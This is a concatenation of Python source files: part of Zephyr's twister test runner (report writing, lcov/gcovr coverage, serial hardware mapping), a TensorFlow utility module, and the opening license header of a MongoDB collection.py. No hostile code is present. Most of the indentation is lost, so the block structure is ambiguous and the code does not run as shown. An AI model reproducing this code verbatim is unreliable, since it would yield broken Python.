log_file = os.path.join(log_root, "handler.log")
el.text = self.process_log(log_file)
elif instance.results[k] == 'PASS' \
or (not instance.run and instance.status in ["passed"]):
pass
elif instance.results[k] == 'SKIP' or (instance.status in ["skipped"]):
el = ET.SubElement(eleTestcase, 'skipped', type="skipped", message=instance.reason)
else:
el = ET.SubElement(
eleTestcase,
'error',
type="error",
message=f"{instance.reason}")
else:
if platform:
classname = ".".join(instance.testcase.name.split(".")[:2])
else:
classname = p + ":" + ".".join(instance.testcase.name.split(".")[:2])
                    # remove testcases that are being re-run from existing reports
for tc in eleTestsuite.findall(f'testcase/[@classname="{classname}"][@name="{instance.testcase.name}"]'):
eleTestsuite.remove(tc)
eleTestcase = ET.SubElement(eleTestsuite, 'testcase',
classname=classname,
name="%s" % (instance.testcase.name),
time="%f" % handler_time)
if instance.status in ["error", "failed", "timeout"]:
failure = ET.SubElement(
eleTestcase,
'failure',
type="failure",
message=instance.reason)
log_root = ("%s/%s/%s" % (self.outdir, instance.platform.name, instance.testcase.name))
bl = os.path.join(log_root, "build.log")
hl = os.path.join(log_root, "handler.log")
log_file = bl
if instance.reason != 'Build error':
if os.path.exists(hl):
log_file = hl
else:
log_file = bl
failure.text = self.process_log(log_file)
elif instance.status == "skipped":
ET.SubElement(eleTestcase, 'skipped', type="skipped", message="Skipped")
result = ET.tostring(eleTestsuites)
with open(filename, 'wb') as report:
report.write(result)
return fails, passes, errors, skips
def csv_report(self, filename):
with open(filename, "wt") as csvfile:
fieldnames = ["test", "arch", "platform", "status",
"extra_args", "handler", "handler_time", "ram_size",
"rom_size"]
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
cw.writeheader()
for instance in self.instances.values():
rowdict = {"test": instance.testcase.name,
"arch": instance.platform.arch,
"platform": instance.platform.name,
"extra_args": " ".join(instance.testcase.extra_args),
"handler": instance.platform.simulation}
rowdict["status"] = instance.status
if instance.status not in ["error", "failed", "timeout"]:
if instance.handler:
rowdict["handler_time"] = instance.metrics.get("handler_time", 0)
ram_size = instance.metrics.get("ram_size", 0)
rom_size = instance.metrics.get("rom_size", 0)
rowdict["ram_size"] = ram_size
rowdict["rom_size"] = rom_size
cw.writerow(rowdict)
def json_report(self, filename, append=False, version="NA"):
logger.info(f"Writing JSON report {filename}")
report = {}
selected = self.selected_platforms
report["environment"] = {"os": os.name,
"zephyr_version": version,
"toolchain": self.get_toolchain()
}
json_data = {}
if os.path.exists(filename) and append:
with open(filename, 'r') as json_file:
json_data = json.load(json_file)
suites = json_data.get("testsuites", [])
if suites:
suite = suites[0]
testcases = suite.get("testcases", [])
else:
suite = {}
testcases = []
for p in selected:
inst = self.get_platform_instances(p)
for _, instance in inst.items():
testcase = {}
handler_log = os.path.join(instance.build_dir, "handler.log")
build_log = os.path.join(instance.build_dir, "build.log")
device_log = os.path.join(instance.build_dir, "device.log")
handler_time = instance.metrics.get('handler_time', 0)
                ram_size = instance.metrics.get("ram_size", 0)
                rom_size = instance.metrics.get("rom_size", 0)
                for k in instance.results.keys():
                    testcases = list(filter(lambda d: not (d.get('testcase') == k and d.get('platform') == p), testcases))
testcase = {"testcase": k,
"arch": instance.platform.arch,
"platform": p,
}
if instance.results[k] in ["PASS"]:
testcase["status"] = "passed"
if instance.handler:
testcase["execution_time"] = handler_time
if ram_size:
testcase["ram_size"] = ram_size
if rom_size:
testcase["rom_size"] = rom_size
elif instance.results[k] in ['FAIL', 'BLOCK'] or instance.status in ["error", "failed", "timeout"]:
testcase["status"] = "failed"
testcase["reason"] = instance.reason
testcase["execution_time"] = handler_time
if os.path.exists(handler_log):
testcase["test_output"] = self.process_log(handler_log)
elif os.path.exists(device_log):
testcase["device_log"] = self.process_log(device_log)
else:
testcase["build_log"] = self.process_log(build_log)
else:
testcase["status"] = "skipped"
testcase["reason"] = instance.reason
testcases.append(testcase)
suites = [ {"testcases": testcases} ]
report["testsuites"] = suites
with open(filename, "wt") as json_file:
json.dump(report, json_file, indent=4, separators=(',',':'))
def get_testcase(self, identifier):
results = []
for _, tc in self.testcases.items():
for case in tc.cases:
if case == identifier:
results.append(tc)
return results
class CoverageTool:
""" Base class for every supported coverage tool
"""
def __init__(self):
self.gcov_tool = None
self.base_dir = None
@staticmethod
def factory(tool):
if tool == 'lcov':
t = Lcov()
elif tool == 'gcovr':
t = Gcovr()
else:
logger.error("Unsupported coverage tool specified: {}".format(tool))
return None
logger.debug(f"Select {tool} as the coverage tool...")
return t
@staticmethod
    def retrieve_gcov_data(input_file):
        logger.debug("Working on %s" % input_file)
        extracted_coverage_info = {}
        capture_data = False
        capture_complete = False
        with open(input_file, 'r') as fp:
for line in fp.readlines():
if re.search("GCOV_COVERAGE_DUMP_START", line):
capture_data = True
continue
if re.search("GCOV_COVERAGE_DUMP_END", line):
capture_complete = True
break
# Loop until the coverage data is found.
if not capture_data:
continue
if line.startswith("*"):
sp = line.split("<")
if len(sp) > 1:
# Remove the leading delimiter "*"
file_name = sp[0][1:]
# Remove the trailing new line char
hex_dump = sp[1][:-1]
else:
continue
else:
continue
extracted_coverage_info.update({file_name: hex_dump})
if not capture_data:
capture_complete = True
return {'complete': capture_complete, 'data': extracted_coverage_info}
@staticmethod
def create_gcda_files(extracted_coverage_info):
logger.debug("Generating gcda files")
for filename, hexdump_val in extracted_coverage_info.items():
            # gcovr fails when coverage data for kobject_hash is present,
            # so skip it (a problem only with gcovr v4.1)
if "kobject_hash" in filename:
filename = (filename[:-4]) + "gcno"
try:
os.remove(filename)
except Exception:
pass
continue
with open(filename, 'wb') as fp:
fp.write(bytes.fromhex(hexdump_val))
def generate(self, outdir):
for filename in glob.glob("%s/**/handler.log" % outdir, recursive=True):
gcov_data = self.__class__.retrieve_gcov_data(filename)
capture_complete = gcov_data['complete']
extracted_coverage_info = gcov_data['data']
if capture_complete:
self.__class__.create_gcda_files(extracted_coverage_info)
logger.debug("Gcov data captured: {}".format(filename))
else:
logger.error("Gcov data capture incomplete: {}".format(filename))
with open(os.path.join(outdir, "coverage.log"), "a") as coveragelog:
ret = self._generate(outdir, coveragelog)
if ret == 0:
logger.info("HTML report generated: {}".format(
os.path.join(outdir, "coverage", "index.html")))
class Lcov(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('*' + pattern + '*')
def add_ignore_directory(self, pattern):
self.ignores.append('*/' + pattern + '/*')
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.info")
ztestfile = os.path.join(outdir, "ztest.info")
cmd = ["lcov", "--gcov-tool", self.gcov_tool,
"--capture", "--directory", outdir,
"--rc", "lcov_branch_coverage=1",
"--output-file", coveragefile]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--extract",
coveragefile,
os.path.join(self.base_dir, "tests", "ztest", "*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
subprocess.call(["lcov", "--gcov-tool", self.gcov_tool, "--remove",
ztestfile,
os.path.join(self.base_dir, "tests/ztest/test/*"),
"--output-file", ztestfile,
"--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
for i in self.ignores:
subprocess.call(
["lcov", "--gcov-tool", self.gcov_tool, "--remove",
coveragefile, i, "--output-file",
coveragefile, "--rc", "lcov_branch_coverage=1"],
stdout=coveragelog)
        # The --ignore-errors source option is added so genhtml does not exit due to
        # samples/application_development/external_lib/
return subprocess.call(["genhtml", "--legend", "--branch-coverage",
"--ignore-errors", "source",
"-output-directory",
os.path.join(outdir, "coverage")] + files,
stdout=coveragelog)
class Gcovr(CoverageTool):
def __init__(self):
super().__init__()
self.ignores = []
def add_ignore_file(self, pattern):
self.ignores.append('.*' + pattern + '.*')
def add_ignore_directory(self, pattern):
self.ignores.append(".*/" + pattern + '/.*')
@staticmethod
    def _interleave_list(prefix, values):
        # Build [prefix, v1, prefix, v2, ...] so the same command-line flag is repeated per value.
        return [x for value in values for x in (prefix, value)]
def _generate(self, outdir, coveragelog):
coveragefile = os.path.join(outdir, "coverage.json")
ztestfile = os.path.join(outdir, "ztest.json")
excludes = Gcovr._interleave_list("-e", self.ignores)
# We want to remove tests/* and tests/ztest/test/* but save tests/ztest
cmd = ["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-e", "tests/*"] + excludes + ["--json", "-o",
coveragefile, outdir]
cmd_str = " ".join(cmd)
logger.debug(f"Running {cmd_str}...")
subprocess.call(cmd, stdout=coveragelog)
subprocess.call(["gcovr", "-r", self.base_dir, "--gcov-executable",
self.gcov_tool, "-f", "tests/ztest", "-e",
"tests/ztest/test/*", "--json", "-o", ztestfile,
outdir], stdout=coveragelog)
if os.path.exists(ztestfile) and os.path.getsize(ztestfile) > 0:
files = [coveragefile, ztestfile]
else:
files = [coveragefile]
subdir = os.path.join(outdir, "coverage")
os.makedirs(subdir, exist_ok=True)
tracefiles = self._interleave_list("--add-tracefile", files)
return subprocess.call(["gcovr", "-r", self.base_dir, "--html",
"--html-details"] + tracefiles +
["-o", os.path.join(subdir, "index.html")],
stdout=coveragelog)
class DUT(object):
def __init__(self,
id=None,
serial=None,
platform=None,
product=None,
serial_pty=None,
connected=False,
pre_script=None,
post_script=None,
post_flash_script=None,
runner=None):
self.serial = serial
self.platform = platform
self.serial_pty = serial_pty
self._counter = Value("i", 0)
self._available = Value("i", 1)
self.connected = connected
self.pre_script = pre_script
self.id = id
self.product = product
self.runner = runner
self.fixtures = []
self.post_flash_script = post_flash_script
self.post_script = post_script
self.pre_script = pre_script
self.probe_id = None
self.notes = None
self.lock = Lock()
self.match = False
@property
def available(self):
with self._available.get_lock():
return self._available.value
@available.setter
def available(self, value):
with self._available.get_lock():
self._available.value = value
@property
def counter(self):
with self._counter.get_lock():
return self._counter.value
@counter.setter
def counter(self, value):
with self._counter.get_lock():
self._counter.value = value
def to_dict(self):
d = {}
exclude = ['_available', '_counter', 'match']
v = vars(self)
for k in v.keys():
if k not in exclude and v[k]:
d[k] = v[k]
return d
def __repr__(self):
return f"<{self.platform} ({self.product}) on {self.serial}>"
class HardwareMap:
schema_path = os.path.join(ZEPHYR_BASE, "scripts", "schemas", "twister", "hwmap-schema.yaml")
manufacturer = [
'ARM',
'SEGGER',
'MBED',
'STMicroelectronics',
'Atmel Corp.',
'Texas Instruments',
'Silicon Labs',
'NXP Semiconductors',
'Microchip Technology Inc.',
'FTDI',
'Digilent'
]
runner_mapping = {
'pyocd': [
'DAPLink CMSIS-DAP',
'MBED CMSIS-DAP'
],
'jlink': [
'J-Link',
'J-Link OB'
],
'openocd': [
'STM32 STLink', '^XDS110.*', 'STLINK-V3'
],
'dediprog': [
'TTL232R-3V3',
'MCP2200 USB Serial Port Emulator'
]
}
def __init__(self):
self.detected = []
self.duts = []
def add_device(self, serial, platform, pre_script, is_pty):
device = DUT(platform=platform, connected=True, pre_script=pre_script)
if is_pty:
device.serial_pty = serial
else:
device.serial = serial
self.duts.append(device)
def load(self, map_file):
hwm_schema = scl.yaml_load(self.schema_path)
duts = scl.yaml_load_verify(map_file, hwm_schema)
for dut in duts:
pre_script = dut.get('pre_script')
post_script = dut.get('post_script')
post_flash_script = dut.get('post_flash_script')
platform = dut.get('platform')
id = dut.get('id')
runner = dut.get('runner')
serial = dut.get('serial')
product = dut.get('product')
fixtures = dut.get('fixtures', [])
new_dut = DUT(platform=platform,
product=product,
runner=runner,
id=id,
serial=serial,
connected=serial is not None,
pre_script=pre_script,
post_script=post_script,
post_flash_script=post_flash_script)
new_dut.fixtures = fixtures
new_dut.counter = 0
self.duts.append(new_dut)
def scan(self, persistent=False):
from serial.tools import list_ports
if persistent and platform.system() == 'Linux':
# On Linux, /dev/serial/by-id provides symlinks to
# '/dev/ttyACMx' nodes using names which are unique as
# long as manufacturers fill out USB metadata nicely.
#
# This creates a map from '/dev/ttyACMx' device nodes
# to '/dev/serial/by-id/usb-...' symlinks. The symlinks
# go into the hardware map because they stay the same
# even when the user unplugs / replugs the device.
#
# Some inexpensive USB/serial adapters don't result
# in unique names here, though, so use of this feature
# requires explicitly setting persistent=True.
by_id = Path('/dev/serial/by-id')
def readlink(link):
return str((by_id / link).resolve())
persistent_map = {readlink(link): str(link)
for link in by_id.iterdir()}
else:
persistent_map = {}
serial_devices = list_ports.comports()
logger.info("Scanning connected hardware...")
for d in serial_devices:
if d.manufacturer in self.manufacturer:
# TI XDS110 can have multiple serial devices for a single board
# assume endpoint 0 is the serial, skip all others
if d.manufacturer == 'Texas Instruments' and not d.location.endswith('0'):
continue
s_dev = DUT(platform="unknown",
id=d.serial_number,
serial=persistent_map.get(d.device, d.device),
product=d.product,
runner='unknown')
                for runner, products in self.runner_mapping.items():
if d.product in products:
s_dev.runner = runner
continue
# Try regex matching
for p in products:
if re.match(p, d.product):
s_dev.runner = runner
s_dev.connected = True
self.detected.append(s_dev)
else:
logger.warning("Unsupported device (%s): %s" % (d.manufacturer, d))
def save(self, hwm_file):
# use existing map
self.detected.sort(key=lambda x: x.serial or '')
if os.path.exists(hwm_file):
with open(hwm_file, 'r') as yaml_file:
hwm = yaml.load(yaml_file, Loader=SafeLoader)
if hwm:
hwm.sort(key=lambda x: x['serial'] or '')
# disconnect everything
for h in hwm:
h['connected'] = False
h['serial'] = None
for _detected in self.detected:
for h in hwm:
if _detected.id == h['id'] and _detected.product == h['product'] and not _detected.match:
h['connected'] = True
h['serial'] = _detected.serial
_detected.match = True
new_duts = list(filter(lambda d: not d.match, self.detected))
new = []
for d in new_duts:
new.append(d.to_dict())
if hwm:
hwm = hwm + new
else:
hwm = new
with open(hwm_file, 'w') as yaml_file:
yaml.dump(hwm, yaml_file, Dumper=Dumper, default_flow_style=False)
self.load(hwm_file)
logger.info("Registered devices:")
self.dump()
else:
# create new file
dl = []
for _connected in self.detected:
platform = _connected.platform
id = _connected.id
runner = _connected.runner
serial = _connected.serial
product = _connected.product
d = {
'platform': platform,
'id': id,
'runner': runner,
'serial': serial,
'product': product
}
dl.append(d)
with open(hwm_file, 'w') as yaml_file:
yaml.dump(dl, yaml_file, Dumper=Dumper, default_flow_style=False)
logger.info("Detected devices:")
self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
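# Illustrative sketch (not part of the original script): register one locally connected board
# by its serial device and print the resulting table. Board and device names are examples only.
def _hardware_map_sketch():
    hwmap = HardwareMap()
    hwmap.add_device("/dev/ttyACM0", "frdm_k64f", pre_script=None, is_pty=False)
    hwmap.dump(connected_only=True)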
def size_report(sc):
logger.info(sc.filename)
logger.info("SECTION NAME VMA LMA SIZE HEX SZ TYPE")
for i in range(len(sc.sections)):
v = sc.sections[i]
logger.info("%-17s 0x%08x 0x%08x %8d 0x%05x %-7s" %
(v["name"], v["virt_addr"], v["load_addr"], v["size"], v["size"],
v["type"]))
logger.info("Totals: %d bytes (ROM), %d bytes (RAM)" %
(sc.rom_size, sc.ram_size))
logger.info("")
def export_tests(filename, tests):
with open(filename, "wt") as csvfile:
fieldnames = ['section', 'subsection', 'title', 'reference']
cw = csv.DictWriter(csvfile, fieldnames, lineterminator=os.linesep)
for test in tests:
data = test.split(".")
if len(data) > 1:
subsec = " ".join(data[1].split("_")).title()
rowdict = {
"section": data[0].capitalize(),
"subsection": subsec,
"title": test,
"reference": test
}
cw.writerow(rowdict)
else:
logger.info("{} can't be exported".format(test))
|
tf_util.py
|
import joblib
import numpy as np
import tensorflow as tf # pylint: ignore-module
import copy
import os
import functools
import collections
import multiprocessing
def switch(condition, then_expression, else_expression):
"""Switches between two operations depending on a scalar value (int or bool).
Note that both `then_expression` and `else_expression`
should be symbolic tensors of the *same shape*.
# Arguments
condition: scalar tensor.
then_expression: TensorFlow operation.
else_expression: TensorFlow operation.
"""
x_shape = copy.copy(then_expression.get_shape())
x = tf.cond(tf.cast(condition, 'bool'),
lambda: then_expression,
lambda: else_expression)
x.set_shape(x_shape)
return x
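# Illustrative usage sketch (not part of the original module): evaluate both branches of
# `switch` in the TF1 graph/session style used throughout this file.
def _switch_usage_sketch():
    cond = tf.placeholder(tf.bool, (), name="cond_sketch")
    out = switch(cond, tf.constant(1.0), tf.constant(-1.0))
    with single_threaded_session():
        initialize()
        return out.eval(feed_dict={cond: True}), out.eval(feed_dict={cond: False})  # (1.0, -1.0)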
# ================================================================
# Extras
# ================================================================
def lrelu(x, leak=0.2):
f1 = 0.5 * (1 + leak)
f2 = 0.5 * (1 - leak)
return f1 * x + f2 * abs(x)
# ================================================================
# Mathematical utils
# ================================================================
def huber_loss(x, delta=1.0):
"""Reference: https://en.wikipedia.org/wiki/Huber_loss"""
return tf.where(
tf.abs(x) < delta,
tf.square(x) * 0.5,
delta * (tf.abs(x) - 0.5 * delta)
)
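# Worked example (not part of the original module): with delta=1.0 the loss is quadratic inside
# [-1, 1] and linear outside it, e.g. x=0.5 -> 0.5 * 0.25 = 0.125 and x=3.0 -> 1.0 * (3.0 - 0.5) = 2.5.
def _huber_loss_sketch():
    loss = huber_loss(tf.constant([0.5, 3.0]), delta=1.0)
    with single_threaded_session():
        return loss.eval()  # approximately [0.125, 2.5]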
# ================================================================
# Global session
# ================================================================
def get_session(config=None):
"""Get default session or create one with a given config"""
sess = tf.get_default_session()
if sess is None:
sess = make_session(config=config, make_default=True)
return sess
def make_session(config=None, num_cpu=None, make_default=False, graph=None):
"""Returns a session that will use <num_cpu> CPU's only"""
if num_cpu is None:
num_cpu = int(os.getenv('RCALL_NUM_CPU', multiprocessing.cpu_count()))
if config is None:
config = tf.ConfigProto(
allow_soft_placement=True,
inter_op_parallelism_threads=num_cpu,
intra_op_parallelism_threads=num_cpu)
config.gpu_options.allow_growth = True
if make_default:
return tf.InteractiveSession(config=config, graph=graph)
else:
return tf.Session(config=config, graph=graph)
def single_threaded_session():
"""Returns a session which will only use a single CPU"""
return make_session(num_cpu=1)
def in_session(f):
@functools.wraps(f)
def newfunc(*args, **kwargs):
with tf.Session():
f(*args, **kwargs)
return newfunc
ALREADY_INITIALIZED = set()
def initialize():
"""Initialize all the uninitialized variables in the global scope."""
new_variables = set(tf.global_variables()) - ALREADY_INITIALIZED
get_session().run(tf.variables_initializer(new_variables))
ALREADY_INITIALIZED.update(new_variables)
# ================================================================
# Model components
# ================================================================
def normc_initializer(std=1.0, axis=0):
def _initializer(shape, dtype=None, partition_info=None): # pylint: disable=W0613
out = np.random.randn(*shape).astype(dtype.as_numpy_dtype)
out *= std / np.sqrt(np.square(out).sum(axis=axis, keepdims=True))
return tf.constant(out)
return _initializer
def conv2d(x, num_filters, name, filter_size=(3, 3), stride=(1, 1), pad="SAME", dtype=tf.float32, collections=None,
summary_tag=None):
with tf.variable_scope(name):
stride_shape = [1, stride[0], stride[1], 1]
filter_shape = [filter_size[0], filter_size[1], int(x.get_shape()[3]), num_filters]
# there are "num input feature maps * filter height * filter width"
# inputs to each hidden unit
fan_in = intprod(filter_shape[:3])
# each unit in the lower layer receives a gradient from:
# "num output feature maps * filter height * filter width" /
# pooling size
fan_out = intprod(filter_shape[:2]) * num_filters
# initialize weights with random weights
w_bound = np.sqrt(6. / (fan_in + fan_out))
w = tf.get_variable("W", filter_shape, dtype, tf.random_uniform_initializer(-w_bound, w_bound),
collections=collections)
b = tf.get_variable("b", [1, 1, 1, num_filters], initializer=tf.zeros_initializer(),
collections=collections)
if summary_tag is not None:
tf.summary.image(summary_tag,
tf.transpose(tf.reshape(w, [filter_size[0], filter_size[1], -1, 1]),
[2, 0, 1, 3]),
max_images=10)
return tf.nn.conv2d(x, w, stride_shape, pad) + b
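# Worked example (not part of the original module) of the bound computed in conv2d() above:
# a 3x3 filter over 16 input channels producing 32 maps gives fan_in = 3*3*16 = 144,
# fan_out = 3*3*32 = 288, hence w_bound = sqrt(6 / 432) ~= 0.118.
def _conv2d_bound_sketch(filter_size=(3, 3), in_channels=16, num_filters=32):
    filter_shape = [filter_size[0], filter_size[1], in_channels, num_filters]
    fan_in = intprod(filter_shape[:3])
    fan_out = intprod(filter_shape[:2]) * num_filters
    return np.sqrt(6. / (fan_in + fan_out))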
# ================================================================
# Theano-like Function
# ================================================================
def function(inputs, outputs, updates=None, givens=None):
"""Just like Theano function. Take a bunch of tensorflow placeholders and expressions
computed based on those placeholders and produces f(inputs) -> outputs. Function f takes
values to be fed to the input's placeholders and produces the values of the expressions
in outputs.
Input values can be passed in the same order as inputs or can be provided as kwargs based
on placeholder name (passed to constructor or accessible via placeholder.op.name).
Example:
x = tf.placeholder(tf.int32, (), name="x")
y = tf.placeholder(tf.int32, (), name="y")
z = 3 * x + 2 * y
lin = function([x, y], z, givens={y: 0})
with single_threaded_session():
initialize()
assert lin(2) == 6
assert lin(x=3) == 9
assert lin(2, 2) == 10
assert lin(x=2, y=3) == 12
Parameters
----------
inputs: [tf.placeholder, tf.constant, or object with make_feed_dict method]
list of input arguments
outputs: [tf.Variable] or tf.Variable
        list of outputs or a single output to be returned from function. Returned
        value will have the same structure (a list for a list, a single value otherwise).
"""
if isinstance(outputs, list):
return _Function(inputs, outputs, updates, givens=givens)
elif isinstance(outputs, (dict, collections.OrderedDict)):
f = _Function(inputs, outputs.values(), updates, givens=givens)
return lambda *args, **kwargs: type(outputs)(zip(outputs.keys(), f(*args, **kwargs)))
else:
f = _Function(inputs, [outputs], updates, givens=givens)
return lambda *args, **kwargs: f(*args, **kwargs)[0]
class _Function(object):
def __init__(self, inputs, outputs, updates, givens):
for inpt in inputs:
if not hasattr(inpt, 'make_feed_dict') and not (type(inpt) is tf.Tensor and len(inpt.op.inputs) == 0):
assert False, "inputs should all be placeholders, constants, or have a make_feed_dict method"
self.inputs = inputs
updates = updates or []
self.update_group = tf.group(*updates)
self.outputs_update = list(outputs) + [self.update_group]
self.givens = {} if givens is None else givens
def _feed_input(self, feed_dict, inpt, value):
if hasattr(inpt, 'make_feed_dict'):
feed_dict.update(inpt.make_feed_dict(value))
else:
feed_dict[inpt] = adjust_shape(inpt, value)
def __call__(self, *args):
assert len(args) <= len(self.inputs), "Too many arguments provided"
feed_dict = {}
# Update the args
for inpt, value in zip(self.inputs, args):
self._feed_input(feed_dict, inpt, value)
# Update feed dict with givens.
for inpt in self.givens:
feed_dict[inpt] = adjust_shape(inpt, feed_dict.get(inpt, self.givens[inpt]))
results = get_session().run(self.outputs_update, feed_dict=feed_dict)[:-1]
return results
# ================================================================
# Flat vectors
# ================================================================
def var_shape(x):
out = x.get_shape().as_list()
assert all(isinstance(a, int) for a in out), \
"shape function assumes that shape is fully known"
return out
def numel(x):
return intprod(var_shape(x))
def intprod(x):
return int(np.prod(x))
def flatgrad(loss, var_list, clip_norm=None):
grads = tf.gradients(loss, var_list)
if clip_norm is not None:
grads = [tf.clip_by_norm(grad, clip_norm=clip_norm) for grad in grads]
return tf.concat(axis=0, values=[
tf.reshape(grad if grad is not None else tf.zeros_like(v), [numel(v)])
for (v, grad) in zip(var_list, grads)
])
class SetFromFlat(object):
def __init__(self, var_list, dtype=tf.float32):
assigns = []
shapes = list(map(var_shape, var_list))
total_size = np.sum([intprod(shape) for shape in shapes])
self.theta = theta = tf.placeholder(dtype, [total_size])
start = 0
assigns = []
for (shape, v) in zip(shapes, var_list):
size = intprod(shape)
assigns.append(tf.assign(v, tf.reshape(theta[start:start + size], shape)))
start += size
self.op = tf.group(*assigns)
def __call__(self, theta):
tf.get_default_session().run(self.op, feed_dict={self.theta: theta})
class GetFlat(object):
def __init__(self, var_list):
self.op = tf.concat(axis=0, values=[tf.reshape(v, [numel(v)]) for v in var_list])
def __call__(self):
return tf.get_default_session().run(self.op)
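# Illustrative round trip (not part of the original module): pack two variables into one flat
# vector with GetFlat, then write a modified vector back with SetFromFlat.
def _flat_vector_sketch():
    with tf.variable_scope("flat_sketch", reuse=tf.AUTO_REUSE):
        a = tf.get_variable("a", [2, 3])
        b = tf.get_variable("b", [4])
    get_flat, set_from_flat = GetFlat([a, b]), SetFromFlat([a, b])
    with single_threaded_session():
        initialize()
        theta = get_flat()                   # shape (2*3 + 4,) == (10,)
        set_from_flat(np.zeros_like(theta))  # overwrite a and b with zeros
        return get_flat()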
def flattenallbut0(x):
return tf.reshape(x, [-1, intprod(x.get_shape().as_list()[1:])])
# =============================================================
# TF placeholders management
# ============================================================
_PLACEHOLDER_CACHE = {} # name -> (placeholder, dtype, shape)
def get_placeholder(name, dtype, shape):
if name in _PLACEHOLDER_CACHE:
out, dtype1, shape1 = _PLACEHOLDER_CACHE[name]
if out.graph == tf.get_default_graph():
assert dtype1 == dtype and shape1 == shape, \
'Placeholder with name {} has already been registered and has shape {}, different from requested {}'.format(name, shape1, shape)
return out
out = tf.placeholder(dtype=dtype, shape=shape, name=name)
_PLACEHOLDER_CACHE[name] = (out, dtype, shape)
return out
def get_placeholder_cached(name):
return _PLACEHOLDER_CACHE[name][0]
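# Illustrative sketch (not part of the original module): a second request for the same
# (name, dtype, shape) returns the cached placeholder, so graph pieces can share inputs by name.
def _placeholder_cache_sketch():
    x1 = get_placeholder("obs_sketch", tf.float32, [None, 4])
    x2 = get_placeholder_cached("obs_sketch")
    assert x1 is x2
    return x1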
# ================================================================
# Diagnostics
# ================================================================
def display_var_info(vars):
from baselines import logger
count_params = 0
for v in vars:
name = v.name
if "/Adam" in name or "beta1_power" in name or "beta2_power" in name: continue
v_params = np.prod(v.shape.as_list())
count_params += v_params
if "/b:" in name or "/biases" in name: continue # Wx+b, bias is not interesting to look at => count params, but not print
logger.info(" %s%s %i params %s" % (name, " "*(55-len(name)), v_params, str(v.shape)))
logger.info("Total model parameters: %0.2f million" % (count_params*1e-6))
def get_available_gpus():
# recipe from here:
# https://stackoverflow.com/questions/38559755/how-to-get-current-available-gpus-in-tensorflow?utm_medium=organic&utm_source=google_rich_qa&utm_campaign=google_rich_qa
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
return [x.name for x in local_device_protos if x.device_type == 'GPU']
# ================================================================
# Saving variables
# ================================================================
def load_state(fname, sess=None):
sess = sess or get_session()
saver = tf.train.Saver()
saver.restore(tf.get_default_session(), fname)
def save_state(fname, sess=None):
sess = sess or get_session()
os.makedirs(os.path.dirname(fname), exist_ok=True)
saver = tf.train.Saver()
saver.save(tf.get_default_session(), fname)
# The methods above and below clearly do the same thing, in a rather similar way
# TODO: ensure there are no subtle differences and remove one
def save_variables(save_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
ps = sess.run(variables)
save_dict = {v.name: value for v, value in zip(variables, ps)}
os.makedirs(os.path.dirname(save_path), exist_ok=True)
joblib.dump(save_dict, save_path)
def load_variables(load_path, variables=None, sess=None):
sess = sess or get_session()
variables = variables or tf.trainable_variables()
loaded_params = joblib.load(os.path.expanduser(load_path))
restores = []
for v in variables:
restores.append(v.assign(loaded_params[v.name]))
sess.run(restores)
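# Illustrative round trip through save_variables/load_variables (not part of the original
# module); the path is only an example.
def _save_load_variables_sketch(path="/tmp/tf_util_sketch/params.joblib"):
    with tf.variable_scope("save_sketch", reuse=tf.AUTO_REUSE):
        w = tf.get_variable("w", [3])
    with single_threaded_session():
        initialize()
        save_variables(path, variables=[w])  # dump {variable name: value} with joblib
        load_variables(path, variables=[w])  # assign the saved values back
        return w.eval()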
# ================================================================
# Shape adjustment for feeding into tf placeholders
# ================================================================
def adjust_shape(placeholder, data):
'''
    adjust shape of the data to the shape of the placeholder, if possible.
    If the shape is incompatible, an AssertionError is raised.
Parameters:
placeholder tensorflow input placeholder
data input data to be (potentially) reshaped to be fed into placeholder
Returns:
reshaped data
'''
if not isinstance(data, np.ndarray) and not isinstance(data, list):
return data
if isinstance(data, list):
data = np.array(data)
placeholder_shape = [x or -1 for x in placeholder.shape.as_list()]
assert _check_shape(placeholder_shape, data.shape), \
'Shape of data {} is not compatible with shape of the placeholder {}'.format(data.shape, placeholder_shape)
return np.reshape(data, placeholder_shape)
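# Illustrative sketch (not part of the original module): a plain Python list is converted to an
# ndarray and reshaped to match the (None, 2) placeholder, with None treated as -1.
def _adjust_shape_sketch():
    ph = tf.placeholder(tf.float32, [None, 2], name="adjust_sketch")
    return adjust_shape(ph, [[1, 2], [3, 4], [5, 6]])  # ndarray of shape (3, 2)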
def _check_shape(placeholder_shape, data_shape):
''' check if two shapes are compatible (i.e. differ only by dimensions of size 1, or by the batch dimension)'''
    # NOTE: the detailed comparison below is currently unreachable because of this early return;
    # shape compatibility is effectively only enforced by np.reshape() in adjust_shape().
    return True
squeezed_placeholder_shape = _squeeze_shape(placeholder_shape)
squeezed_data_shape = _squeeze_shape(data_shape)
for i, s_data in enumerate(squeezed_data_shape):
s_placeholder = squeezed_placeholder_shape[i]
if s_placeholder != -1 and s_data != s_placeholder:
return False
return True
def _squeeze_shape(shape):
return [x for x in shape if x != 1]
# ================================================================
# Tensorboard interfacing
# ================================================================
def launch_tensorboard_in_background(log_dir):
from tensorboard import main as tb
import threading
tf.flags.FLAGS.logdir = log_dir
    t = threading.Thread(target=tb.main, args=())
t.start()
|
collection.py
|
# Copyright 2009-present MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
